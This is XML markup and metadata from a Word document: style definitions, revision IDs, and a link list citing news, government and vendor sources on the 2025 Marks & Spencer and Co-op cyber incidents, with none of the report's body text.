  <w:num w:numId="16" w16cid:durableId="915355591">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1503624156">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1024021334">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1008171574">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="70394542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7136"/>
    <w:rsid w:val="00027FDF"/>
    <w:rsid w:val="00053404"/>
    <w:rsid w:val="0009137A"/>
    <w:rsid w:val="000B4C80"/>
    <w:rsid w:val="000C1615"/>
    <w:rsid w:val="00100EEB"/>
    <w:rsid w:val="00115C04"/>
    <w:rsid w:val="00162430"/>
    <w:rsid w:val="001F5F36"/>
    <w:rsid w:val="0020761A"/>
    <w:rsid w:val="00236891"/>
    <w:rsid w:val="00335216"/>
    <w:rsid w:val="00340F08"/>
    <w:rsid w:val="003A1065"/>
    <w:rsid w:val="003C3AB1"/>
    <w:rsid w:val="00424DAD"/>
    <w:rsid w:val="00431F78"/>
    <w:rsid w:val="0043542B"/>
    <w:rsid w:val="004859A7"/>
    <w:rsid w:val="00493E45"/>
    <w:rsid w:val="004E0A72"/>
    <w:rsid w:val="004F0197"/>
    <w:rsid w:val="004F48E8"/>
    <w:rsid w:val="00515A10"/>
    <w:rsid w:val="00527136"/>
    <w:rsid w:val="00572A20"/>
    <w:rsid w:val="005A4967"/>
    <w:rsid w:val="005D1B03"/>
    <w:rsid w:val="006218ED"/>
    <w:rsid w:val="006315F9"/>
    <w:rsid w:val="00735442"/>
    <w:rsid w:val="0076698F"/>
    <w:rsid w:val="007864B5"/>
    <w:rsid w:val="007A6FB6"/>
    <w:rsid w:val="007B1C33"/>
    <w:rsid w:val="0085330D"/>
    <w:rsid w:val="009042DB"/>
    <w:rsid w:val="00905635"/>
    <w:rsid w:val="0093252F"/>
    <w:rsid w:val="00981222"/>
    <w:rsid w:val="009B17B1"/>
    <w:rsid w:val="009E658F"/>
    <w:rsid w:val="00A000BA"/>
    <w:rsid w:val="00A453E9"/>
    <w:rsid w:val="00AC7112"/>
    <w:rsid w:val="00B16175"/>
    <w:rsid w:val="00BE6727"/>
    <w:rsid w:val="00C0063E"/>
    <w:rsid w:val="00CB2C98"/>
    <w:rsid w:val="00CC10EA"/>
    <w:rsid w:val="00D014A0"/>
    <w:rsid w:val="00D038B0"/>
    <w:rsid w:val="00D3632C"/>
    <w:rsid w:val="00D67D43"/>
    <w:rsid w:val="00E76390"/>
    <w:rsid w:val="00EB2E5F"/>
    <w:rsid w:val="00F16CB9"/>
    <w:rsid w:val="00F6106A"/>
    <w:rsid w:val="00FB180E"/>
    <w:rsid w:val="00FB43C4"/>
    <w:rsid w:val="00FF161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806203E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F4B57F57-C0F1-42EB-A4A1-3E2F034783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1"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713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52713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52713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2713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2713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2713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2713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2713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2713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713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52713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52713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2713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2713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2713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2713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2713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27136"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0052713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713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2713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2713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27136"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0052713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27136"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00527136"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="highlights">
    <w:name w:val="highlights"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A453E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FB180E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="194" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="321" w:hanging="298"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="521"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00115C04"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00115C04"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00115C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corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update-0" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/search?q=https://www.researchgate.net/publication/396199216" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/articles/cql0ple066po"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www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods"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specopssoft.com/blog/marks-spencer-ransomware-active-directory/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.coop.co.uk/cyber-incident" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/news/retailers-incident"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iisf.ie/files/UserFiles/Cyber-technical-guides/Scattered-Spider-and-MandS-Incident_.pdf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://corporate.marksandspencer.com/cyber-update" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/publications/enisa-threat-landscape-2024"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co-operative.coop/media/news-releases/cyber-incident-updat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ico.org.uk/about-the-ico/media-centre/news-and-blogs/2025/05/statement-on-cyber-incidents-impacting-retailers/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://corporate.marksandspencer.com/sites/marksandspencer/files/2025-05/Marks-and-Spencer-Group-plc-Annual-Report-and-Financial-Statements-2025_INTERACTIVE_FINAL.pdf" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks"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corporate.marksandspencer.com/newsroom/press-releases/cyber-incident-further-update" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.co-operative.coop/media/news-releases/co-ops-underlying-strength-allows-the-group-to-navigate-external-pressures" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-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B742F4-5A3D-42B6-8DE6-0FD6856C37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37</Pages>
  <Words>5626</Words>
  <Characters>32074</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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-29T21:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-29T21:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>